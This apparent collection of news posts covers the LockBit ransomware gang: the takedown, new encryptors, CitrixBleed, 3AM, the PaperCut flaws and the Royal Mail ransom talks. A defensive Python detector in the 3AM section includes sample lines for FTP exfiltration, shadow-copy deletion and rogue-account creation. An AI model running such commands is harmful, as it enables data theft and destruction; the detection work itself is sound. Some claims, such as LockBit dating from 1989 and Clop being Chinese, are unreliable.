
LockBit's Double Cross: Ransom Paid, Data Remains Locked Away

 


LockBit ransomware blocks access to victims' computer systems until a ransom is paid. It vets potential targets, confirms that a target is valuable, spreads the infection through the network, and can encrypt every computer on it. 

LockBit is used to carry out highly targeted, largely self-directed attacks against enterprises and other organizations. The cybersecurity landscape is constantly changing and dangerously competitive: adversaries lurk in the shadows, eager to exploit vulnerabilities and disrupt the operations of organizations. 

There are many threats out there, but LockBit is one of the most formidable: it has a long history of evolution and has been known to target large enterprises across various industries. 

Key Characteristics of LockBit

When selecting targets, LockBit meticulously assesses their financial capacity and the disruption an attack could cause before choosing the most lucrative ones. 

Consequently, its attacks concentrate on large businesses in healthcare, education, financial institutions, and government entities. An automated vetting process helps select targets and ensures they meet a defined set of criteria before an attack proceeds. 

One notable aspect of LockBit's strategy is its deliberate avoidance of organizations inside Russia and other Commonwealth of Independent States (CIS) countries. LockBit operates on the Ransomware as a Service (RaaS) business model: affiliates license the ransomware for a fee and share each ransom payment with the LockBit operators. 

According to Graeme Biggar, the director general of Britain's National Crime Agency (NCA), LockBit was the most prolific and harmful ransomware group operating over the last four years. The group targeted thousands of organizations around the world with its ransomware. After the criminal enterprise encrypted the devices on a victim's network and/or stole data from them, it demanded an extortion payment in exchange for the decryption key and a promise to delete the stolen data. 

In recent years, officials have consistently advised against making extortion payments of this type. Such payments fund the criminal ecosystem; there is no guarantee that the decryption key will work, given the sloppy coding often found in ransomware; and criminals should not be trusted merely on their promise to delete victim data. 

The NCA-led operation revealed that some of the data still held by LockBit belonged to victims who had already paid a ransom. The NCA emphasized this point in its report: despite what the criminals promise, paying a ransom does not guarantee that stolen data will be deleted. 

Based on the intelligence gained from the takedown, the agency also plans to release additional information about the gang's finances and its administrator, LockBitSupp, over the remainder of the week.

LockBit Ransomware: Covertly Evolving Towards Next-Gen Threats Amid Takedown Efforts

 

In a significant development, law enforcement dismantled the infrastructure of LockBit ransomware earlier this week, uncovering the clandestine work on a next-generation file encryption malware. Referred to as LockBit-NG-Dev, this emerging threat, likely the precursor to LockBit 4.0, was revealed through a collaborative effort between the UK's National Crime Agency and cybersecurity firm Trend Micro. 

In a departure from its predecessors built in C/C++, LockBit-NG-Dev is a work-in-progress developed in .NET, compiled with CoreRT, and packed with MPRESS. This strategic shift was brought to light as Trend Micro analyzed a sample of the latest LockBit variant capable of operating across multiple systems, indicating a more sophisticated approach to infection. 

Although it lacks some features present in previous versions, such as self-propagation on compromised networks and printing ransom notes on victims' printers, LockBit-NG-Dev appears to be in its final development stages and already provides the core functionality expected of the encryptor. Trend Micro's technical analysis reveals support for three encryption modes (using AES+RSA), "fast," "intermittent," and "full," along with custom file or directory exclusions and the ability to randomize file names to complicate restoration efforts. 

Notably, the malware features a self-delete mechanism that overwrites LockBit's own file contents with null bytes. The discovery of LockBit-NG-Dev is a significant setback for LockBit operators, following law enforcement's Operation Cronos. Even if the gang still controls backup servers, the exposure of the new encryptor's source code poses a formidable challenge for the cybercriminal business. Restoring operations becomes a daunting task when security researchers have knowledge of the encrypting malware's source code. 

This revelation emphasizes the ongoing battle between law enforcement and cybercriminals, underscoring the need for continued vigilance and collaboration to address evolving threats in the ransomware landscape. 

In conclusion, the revelation of LockBit ransomware secretly building a next-gen encryptor serves as a stark reminder of the persistent and adaptive nature of cyber threats. As organizations and cybersecurity professionals work to stay ahead of evolving ransomware tactics, the need for proactive defenses, continuous threat intelligence sharing, and a collective, global response has never been more critical. LockBit's covert evolution reinforces the urgency of fortifying cybersecurity measures to protect against the ever-changing landscape of sophisticated cyber threats.

Researcher Claims: Teens with “Digital Bazookas” are Winning Ransomware War


Boeing, an Australian shipping company, the world's largest bank and the world's biggest law firm have one thing in common: each has suffered at least one cybersecurity incident. These breaches were apparently carried out by a teenage hacker, and all of them stemmed from the companies' failure to patch a critical vulnerability that their security professionals had been warned about weeks earlier, according to a post published by DoublePulsar on Monday. 

According to Kevin Beaumont, a freelance security researcher, the other notable victims include DP World Australia, the Australian branch of the Dubai-based logistics company DP World; the Industrial and Commercial Bank of China (ICBC); and Allen & Overy, a multinational law firm.

All four companies have recently acknowledged at least one security incident. ICBC has also allegedly paid an undisclosed ransom to obtain the keys needed to decrypt data that had remained unavailable since the breach. 

Citing data that allows ransomware operators to be tracked, as well as people familiar with the breaches, Beaumont stated that the four businesses are among the ten victims he knows of that are currently being blackmailed by LockBit, one of the most active and destructive ransomware crime syndicates in the world. Although a fix had been available since October 10, Beaumont said none of the four organizations had applied it to a critical vulnerability in Citrix NetScaler, the networking appliance they all used.

CitrixBleed Bug

Rated 9.4 out of 10 in severity, CitrixBleed is an easy-to-exploit vulnerability that leaks session tokens, which can be used to bypass any multifactor authentication protecting a vulnerable network. Once inside, attackers have the equivalent of a point-and-click desktop PC on the victim's internal network and are free to move around.

In his post, Beaumont wrote:

Ransomware groups are often staffed by almost all teenagers and haven’t been taken seriously for far too long as a threat. They are a threat to civil society as long as organizations keep paying.

Focusing on cybersecurity fundamentals for enterprise-scale organizations is a challenge, as often people are chasing after the perceived next big thing—metaverse (remember that?), NFTs, generative AI—without being able to do the fundamentals well. Large-scale enterprises need to be able to patch vulnerabilities like CitrixBleed quickly.

The cybersecurity reality we live in now is teenagers are running around in organized crime gangs with digital bazookas. They probably have a better asset inventory of your network than you, and they don’t have to wait 4 weeks for 38 people to approve a change request for patching 1 thing.

Know your network boundary and risky products as well as LockBit do. You need to be able to identify and patch something like CitrixBleed within 24 hours—if you cannot, there is a very real possibility it isn’t the ideal product fit for your organization due to the level of risk it poses, and you need to rethink if the architecture of your house is fit for purpose. 

Vendors like Citrix need to have clear statements of intent for securing their products, as piling on patch after patch after patch is not sustainable for many organizations—or customers should opt with their wallets for more proven solutions. The reality is many vendors are shipping appliance products with cybersecurity standards worse than when I started my career in the late '90s—while also advertising themselves as the experts. Marketing is a hell of a drug.

Beaumont also cited query results from the Shodan search service showing that, at the time of the intrusions, none of the four firms had installed the CitrixBleed patch. The vulnerability is tracked as CVE-2023-4966.

The researcher additionally criticized Citrix for NetScaler's logging features, which he said made it practically impossible for customers to determine whether they had been hacked. As a result, some customers who applied the CitrixBleed patch may have been unaware that LockBit was already present on their networks.

Boeing declined to comment on the post.

Ars Technica's emails to Citrix and Allen & Overy went unanswered, and the outlet notes that requests for comment from DP World and ICBC also received no immediate response.

CitrixBleed first provides remote access through Virtual Desktop Infrastructure software; LockBit then uses tools such as Atera, which offers interactive PowerShell sessions without triggering antivirus or endpoint detection alerts, to extend its access to other parts of the compromised network. That access persists even after CitrixBleed is patched, until administrators take specific steps to remove it.  

LockBit Ransomware Falters, Attackers Deploy New '3AM' Malware

 

In a recent cyberattack targeting a construction company, hackers attempted to deploy the LockBit ransomware on a target network but were thwarted. In an unexpected twist, they resorted to a previously unknown ransomware variant called 3AM, successfully infiltrating the system.

The newly discovered ransomware, 3AM, follows a fairly typical pattern by disabling various cybersecurity and backup-related software before encrypting files on the compromised computer. However, it stands out with an unusual theme: the name 3AM, a reference to the eerie hour when only insomniacs, night owls, and malicious hackers are typically active.

Researchers from Symantec highlighted this double-pronged attack in their recent report. It marked the first documented instance of 3AM being used alongside the LockBit ransomware in a single compromised machine.

Dick O'Brien, the principal intelligence analyst for the Symantec threat hunter team, cautioned, "This isn't the first time we've seen attackers employ multiple ransomware families simultaneously, and organizations should be prepared for such scenarios."

Upon gaining access to the target network, the threat actors wasted no time gathering user information and deploying tools for data extraction. They utilized tools like Cobalt Strike and PsExec to escalate privileges and performed reconnaissance tasks such as identifying users and network status. They also sought out other servers for lateral movement and established a new user for persistence. Subsequently, they employed the Wput utility to transfer the victim's files to their FTP server.

Their initial plan was to deploy LockBit ransomware, but the target's robust cybersecurity defenses prevented its execution. Unfortunately for the victim, the attackers had an alternative weapon at their disposal: 3AM ransomware. This malware is characterized by its encryption of files with the ".threeamtime" suffix and references to the time of day in its ransom note.

The ransom note began with an ominous message: "Hello, '3 am' The time of mysticism, isn't it? All your files are mysteriously encrypted, and the systems 'show no signs of life,' the backups disappeared. But we can correct this very quickly and return all your files and operation of the systems to [sic] original state."

In contrast to the creative ransom note, the authors showed less innovation in the design of the malware itself. 3AM is a 64-bit executable written in Rust, a language favored by both attackers and defenders. Before its primary tasks it attempts to terminate various security- and backup-related software on the infected machine; it then scans the disk, identifies specific file types, encrypts them, drops the ransom note, and erases any Volume Shadow Copy Service (VSS) snapshots that could offer the victim a route to recovery.
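As an added defender-side illustration (not Symantec's or the original post's code), the following Python sketch runs one detection per stage of the chain described above, from PsExec lateral movement and the new persistence account through Wput exfiltration over FTP, service stops, VSS deletion and the `.threeamtime` rename, over constructed endpoint telemetry, then flags hosts that show several stages together. The `key=value` log shape, field names, the recon command list and the stage-count threshold are assumptions.

```python
"""Stage-by-stage detections for the LockBit / 3AM intrusion chain in the post.
Added example, not Symantec's or the blog's code. The telemetry shape
(key=value lines), field names and thresholds below are assumptions."""
import re
from collections import defaultdict

# Constructed telemetry (not captured from a real host). One host shows the
# whole chain; another shows only a single, ambiguous "whoami".
SAMPLE_TELEMETRY = """\
2023-09-12T02:41:07Z host=FS01 type=process cmd="whoami /all"
2023-09-12T02:41:19Z host=FS01 type=process cmd="net view /domain"
2023-09-12T02:42:03Z host=FS01 type=process cmd="PSEXESVC.exe"
2023-09-12T02:44:50Z host=FS01 type=process cmd="net user backupsvc P@ss123 /add"
2023-09-12T02:58:12Z host=FS01 type=process cmd="wput.exe D:\\share\\finance.zip ftp://198.51.100.23/drop/"
2023-09-12T03:00:01Z host=FS01 type=process cmd="net stop AcmeBackupSvc /y"
2023-09-12T03:00:04Z host=FS01 type=process cmd="vssadmin.exe delete shadows /all /quiet"
2023-09-12T03:00:09Z host=FS01 type=file_rename path="D:\\share\\Q3-budget.xlsx.threeamtime"
2023-09-12T02:43:11Z host=WS22 type=process cmd="whoami"
2023-09-12T02:43:40Z host=WS22 type=process cmd="notepad.exe C:\\Users\\j.doe\\todo.txt"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+type=(?P<type>\S+)\s+'
    r'(?:cmd|path)="(?P<value>.*)"$'
)

# (stage, event type the rule applies to, pattern). Stage names follow the
# chain in the post; the recon command list is an assumed, non-exhaustive set.
RULES = [
    ("recon", "process",
     re.compile(r"(?i)^(whoami|net\s+view|net\s+user\s*$|nltest|ipconfig)")),
    ("lateral-movement", "process",
     re.compile(r"(?i)\bpsexe(c|svc)(\.exe)?\b")),
    ("persistence", "process",
     re.compile(r"(?i)\bnet\s+user\s+\S+\s+\S+\s+/add\b")),
    ("exfiltration", "process",
     re.compile(r"(?i)\bwput(\.exe)?\b.*\bftp://")),
    ("defense-evasion", "process",
     re.compile(r"(?i)\b(net\s+stop|sc\s+stop|taskkill)\b.*(backup|protect|defen)")),
    ("backup-destruction", "process",
     re.compile(r"(?i)\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b")),
    ("encryption", "file_rename",
     re.compile(r"(?i)\.threeamtime$")),
]


def detect(telemetry):
    """Return one finding (dict) per event that matches a rule."""
    findings = []
    for raw in telemetry.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # tolerate malformed lines instead of aborting the sweep
        ts, host, ev_type, value = m.group("ts", "host", "type", "value")
        for stage, wanted_type, pattern in RULES:
            if ev_type == wanted_type and pattern.search(value):
                findings.append({"ts": ts, "host": host,
                                 "stage": stage, "evidence": value})
    return findings


def correlate(findings, min_stages=3):
    """Flag hosts showing at least min_stages distinct stages as a probable chain.
    A lone "whoami" is noisy by itself; the threshold is an assumed tuning knob."""
    stages_by_host = defaultdict(set)
    for f in findings:
        stages_by_host[f["host"]].add(f["stage"])
    return {host: sorted(stages) for host, stages in stages_by_host.items()
            if len(stages) >= min_stages}


if __name__ == "__main__":
    hits = detect(SAMPLE_TELEMETRY)
    for h in sorted(hits, key=lambda f: (f["host"], f["ts"])):
        print(f'{h["ts"]} {h["host"]:5} {h["stage"]:18} {h["evidence"]}')
    print("probable chains:", correlate(hits))
```

Because each stage is scored separately, the host that was only partially hit is not flagged, mirroring the report's point that earlier stages (recon, PsExec, the new account, the FTP upload) give defenders a chance to intervene before the encryptor runs.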

In this particular attack, the hackers only succeeded in deploying 3AM on three machines, with two of them subsequently blocking the malware. However, the third machine was compromised successfully, where LockBit had failed. While the attackers claimed to have stolen sensitive data from this machine, Symantec couldn't independently verify this claim.

When it comes to defending against ransomware attacks, especially multi-faceted ones like this, O'Brien recommends a defense-in-depth strategy. He emphasizes that organizations should focus on addressing all stages of a potential attack rather than solely concentrating on blocking the ransomware payloads. He underscores the importance of early intervention in thwarting cyberattacks, stating that "the earlier you stop an attack, the better."

LockBit Digital Gang Named Top Ransomware Threat by World Nations

On Wednesday, a group of seven countries, the United States, Canada, Britain, France, Germany, Australia, and New Zealand, jointly identified the criminal organization known as "LockBit" as the primary ransomware threat worldwide, recognizing the digital extortion gang as the leading purveyor of ransomware. 

The cyber authorities of these nations issued a joint advisory, highlighting LockBit's ransomware software, which encrypts victims' data until a ransom is paid. Notably, this software has gained widespread usage among cybercriminals, making LockBit the most prevalent ransomware threat globally. 

What is LockBit Ransomware? 

According to the Canadian Centre for Cyber Security, LockBit ransomware has been observed as early as 1989 and has since evolved into the most prevalent cyber threat encountered by Canadians. This malicious software has gained significant prominence and poses a substantial risk to individuals and organizations across the country. 

The Canadian Centre for Cyber Security has reported a significant surge in global ransomware attacks. In the first half of 2021, these attacks witnessed a staggering increase of 151 percent compared to the corresponding period in the previous year. This alarming rise in ransomware incidents further emphasizes the urgent need for enhanced cybersecurity measures and heightened vigilance in the face of evolving cyber threats. 

How Does it Work? 

LockBit ransomware is a pernicious form of malicious software that specifically aims to immobilize users' computer systems until a ransom is paid. It operates in a sophisticated manner by autonomously assessing potential lucrative targets, spreading the infection, and encrypting all accessible systems within a network. 

This type of ransomware primarily focuses on carrying out highly targeted attacks against enterprises and various other organizations. The operators behind LockBit have established a notorious reputation by issuing menacing threats on a global scale. 

They Employ a Range of Tactics, Including: 

Disrupting operations: LockBit ransomware executes its attack in such a way that critical functions within an organization abruptly come to a halt. This disruption can have severe consequences for the affected entities. 

Extortion for financial gain: The primary motive behind LockBit attacks is monetary gain. The cybercriminals responsible for this ransomware demand a ransom payment from the victims in exchange for restoring access to their systems and data. 

Data theft and blackmail: In addition to encryption, LockBit ransomware also poses a significant risk of data theft. If victims fail to comply with the ransom demands, the attackers may resort to the illegal publication of stolen data as a means of coercion and blackmail. 

What is the Recent Development? 

According to the advisory, the precursor to LockBit ransomware was first detected in September 2019, and it first appeared on cybercrime forums focused primarily on Russian-language discussions. This places the origin of LockBit's operations within the Russian-language cybercrime ecosystem. 

Although the joint advisory provided specific numbers for only three countries, namely 1,700 LockBit-related incidents in the United States, 69 in France, and 15 in New Zealand, LockBit ransomware represents a significant portion of the overall ransomware incidents monitored by all seven participating governments. 

According to the advisory, the involved agencies estimated that the LockBit group was responsible for approximately 11 percent to 23 percent of recent ransomware attacks worldwide. This data highlights the substantial impact and prevalence of LockBit's ransom-seeking hacks across multiple regions, underscoring the urgency to address and combat this cyber threat effectively.

Kyocera AVX: Electronics Manufacturer is the Current Target of LockBit


Kyocera AVX, a global electronics manufacturer, appears to have suffered a data breach: its data has been exposed by the ransomware gang LockBit on the gang's dark web blog. The company was one of several that felt the aftershocks of a breach at Japanese tech firm Fujitsu last year.

The group has set a June 9 deadline for the payment of an undetermined ransom. According to the blog, "all available data will be published" if the company does not collaborate with the cybercriminals before then.

Kyocera AVX

Kyocera AVX manufactures electronic components for clients in the military, industrial and automotive sectors. It was established in the 1970s and has been part of Kyocera, a Japanese electronics business best known for its printers, since 1990. It employs over 10,000 people worldwide.

On May 26th, security researchers revealed that some of the company's data had been leaked and posted to LockBit's dark web victim blog.

The company's data was apparently breached in the wake of last year's cyberattack on Fujitsu. That attack may be what allowed LockBit to mount a supply chain attack, via cyber or social engineering means, on Kyocera AVX and other companies partnered with Fujitsu.

According to a Financial Times report, Fujitsu confirmed the attacks in December after a heads-up from a police agency about a potential intrusion. The intrusion gave outsiders access to emails sent through an email system powered by Fujitsu.

It was later revealed that at least ten Japan-based companies, along with Kyocera AVX were victims of the attack.

LockBit Continues Cyber Activities Against Russia’s Enemy 

The ransomware gang LockBit, which is believed to have originated in Russia, has been in the news for its focus on targeting organizations based in the US and allied countries. 

According to a report by security firm Malwarebytes, 126 victims have been posted by the ransomware gang in February alone.

This year, the gang targeted the UK Royal Mail, demanding ransom of $80 million in bitcoin. When the business refused to pay up, labeling the demands "ridiculous," the gang retaliated by sharing the information along with copies of the conversations between LockBit and Royal Mail's officials.

Later, it stole customer information from WH Smith, a UK high street retailer. The stolen data included the personal information of current and former employees. Since then, there has been no indication of whether the business has paid the ransom.

Most recently, this month the FBI placed a $10 million bounty on Mikhail Pavlovich Matveev, an individual who claims to have been involved with LockBit. With connections to both the Hive and Babuk operations, Matveev is believed to be a major participant in the Russian ransomware ecosystem.  

Ransomware Clop and LockBit Attacked PaperCut Servers

 


Microsoft has stated that recent attacks exploiting two vulnerabilities in the PaperCut print management software are likely associated with an affiliate of the Clop ransomware program. 

PaperCut released updates for its Application Server last month fixing two vulnerabilities that could allow remote, unauthenticated attackers to execute code and access information.

CVE-2023-27350 / ZDI-CAN-18987 / PO-1216: This vulnerability affects PaperCut MF/NG versions 8.0 or later on all OS platforms, on both the Application Server and the Site Server. 

CVE-2023-27351 / ZDI-CAN-19226 / PO-1219: This vulnerability affects PaperCut MF/NG versions 15.0 or later on all Application Server platforms and allows unauthenticated information disclosure.

Last week, Trend Micro notified PaperCut that the vulnerabilities had been exploited in the wild, and PaperCut sent an alert to users urging them to update their servers as soon as possible.

“Microsoft is attributing the recently reported attacks exploiting the CVE-2023-27350 and CVE-2023-27351 vulnerabilities in print management software PaperCut to deliver Clop ransomware to the threat actor tracked as Lace Tempest (overlaps with FIN11 and TA505),” a tweet by Microsoft Threat Intelligence reads.  

Last week, Microsoft Threat Intelligence identified "Lace Tempest", which overlaps with FIN11 and TA505, as one of the threat actors exploiting these bugs. 

FIN11, which was involved in the Accellion FTA extortion campaign, is linked to the infamous Clop ransomware gang, while TA505 has been linked to the Dridex malware and to the Locky ransomware. 

The same Clop affiliate has previously exploited Fortra's GoAnywhere file-transfer software in ransomware campaigns, and has used the widely distributed Raspberry Robin worm for post-compromise activity.

Both flaws affect PaperCut NG and PaperCut MF. CVE-2023-27350 allows an unauthenticated attacker to execute code remotely on a PaperCut Application Server, while CVE-2023-27351 allows an unauthenticated attacker to read information about users stored in PaperCut MF or NG, such as usernames, full names, e-mail addresses, department information, and any credit card numbers on file.

Attackers exploiting this vulnerability can also retrieve the hashed passwords of internal PaperCut accounts, although not the password hashes of users synchronized from external directory sources such as Microsoft 365 and Google Workspace. 

Lace Tempest, also known as DEV-0950, has previously been reported to be a Clop affiliate and has been seen using GoAnywhere exploits and Raspberry Robin malware in ransomware campaigns. Exploitation of the PaperCut vulnerabilities has been observed since April 13. 

A Familiar Pattern for Clop

The exploitation of PaperCut servers fits the pattern seen from the Clop ransomware gang over the last three years. 

Although the Clop operation still encrypts files in its attacks, BleepingComputer has reported that it prefers to steal victims' data so that the data can be used to extort them for ransom. 

In 2020, Clop, a Chinese threat actor, exploited a zero-day vulnerability in Accellion's FTA and stole data from approximately 100 companies as part of this shift in tactics.

More recently, the Clop gang exploited a zero-day vulnerability in the GoAnywhere MFT secure file-sharing platform to steal data from 130 companies.

LockBit Attack: Royal Mail Refused to Pay 'Absurd' Ransom, Chat Logs Show


The LockBit ransomware gang has published what it claims is the detailed transcript of its negotiations with Royal Mail, which is still experiencing complications as a result of last month's cyberattack. 

According to reports, Royal Mail rejected an $80 million (£66 million) ransom demand from the LockBit ransomware gang, declaring that it would "under no circumstances" pay the "absurd amount of money" demanded. 

The chat logs, disclosed by LockBit and published on February 14, appear to document weeks of detailed negotiations between LockBit and its victim, which was attacked on January 10.

The negotiation logs are apparently the first material LockBit has released following the cyberattack on Royal Mail, which halted the British postal service's shipment of certain products overseas. This is despite earlier threats by the Russia-linked ransomware group to publish all stolen data on February 9. 

The records seem to indicate that February 9 was also the last day of negotiations between LockBit and Royal Mail. Screenshots from LockBit's dark web leak site reviewed by TechCrunch show that talks started on January 12, two days after the U.K. postal company acknowledged it had been compromised. 

If the chat logs are legitimate, they indicate that LockBit demanded a grand total of $80 million as a ransom payment, which equals 0.5% of Royal Mail’s annual revenue. The negotiator for Royal Mail appeared to inform LockBit that the company would not comply with the demand and that they had mistaken Royal Mail International for Royal Mail. 

“Under no circumstances will we pay you the absurd amount of money you have demanded[…]We have repeatedly tried to explain to you we are not the large entity you have assumed we are, but rather a smaller subsidiary without the resources you think we have. But you continue to refuse to listen to us. This is an amount that could never be taken seriously by our board.” says Royal Mail’s negotiator (anonymous) to a LockBit representative. 

The ransom demand was reportedly then reduced by LockBit to $70 million on February 1. 

The UK's National Cyber Security Centre, which is investigating the Royal Mail attack, has long urged victims not to pay ransom demands, since paying "does not reduce the risk to individuals, is not an obligation under data protection law, and is not considered as a reasonable step to safeguard data." The FBI likewise advises victims to take precautions such as maintaining data backups rather than complying with extortion demands. 

When approached, Royal Mail did not dispute the legitimacy of the chat records but declined to answer certain questions. "As there is an ongoing investigation, law enforcement has advised that it would be inappropriate to make any further comment on this incident," said a Royal Mail spokesperson, who declined to provide their name. 

Royal Mail's next steps remain unclear. With the negotiations apparently having failed, the company could soon face larger fallout if the stolen data is published online. LockBit's dark web leak site currently states that "all available data" has been published, although the data could not be viewed. 

More than a month after the cyberattack, the postal giant continues to face disruption to its services. According to a company update dated February 14, despite progress (international services have resumed to all destinations for online purchases), the company is still unable to process new Royal Mail parcels and large letters requiring a customs declaration bought at Post Office branches.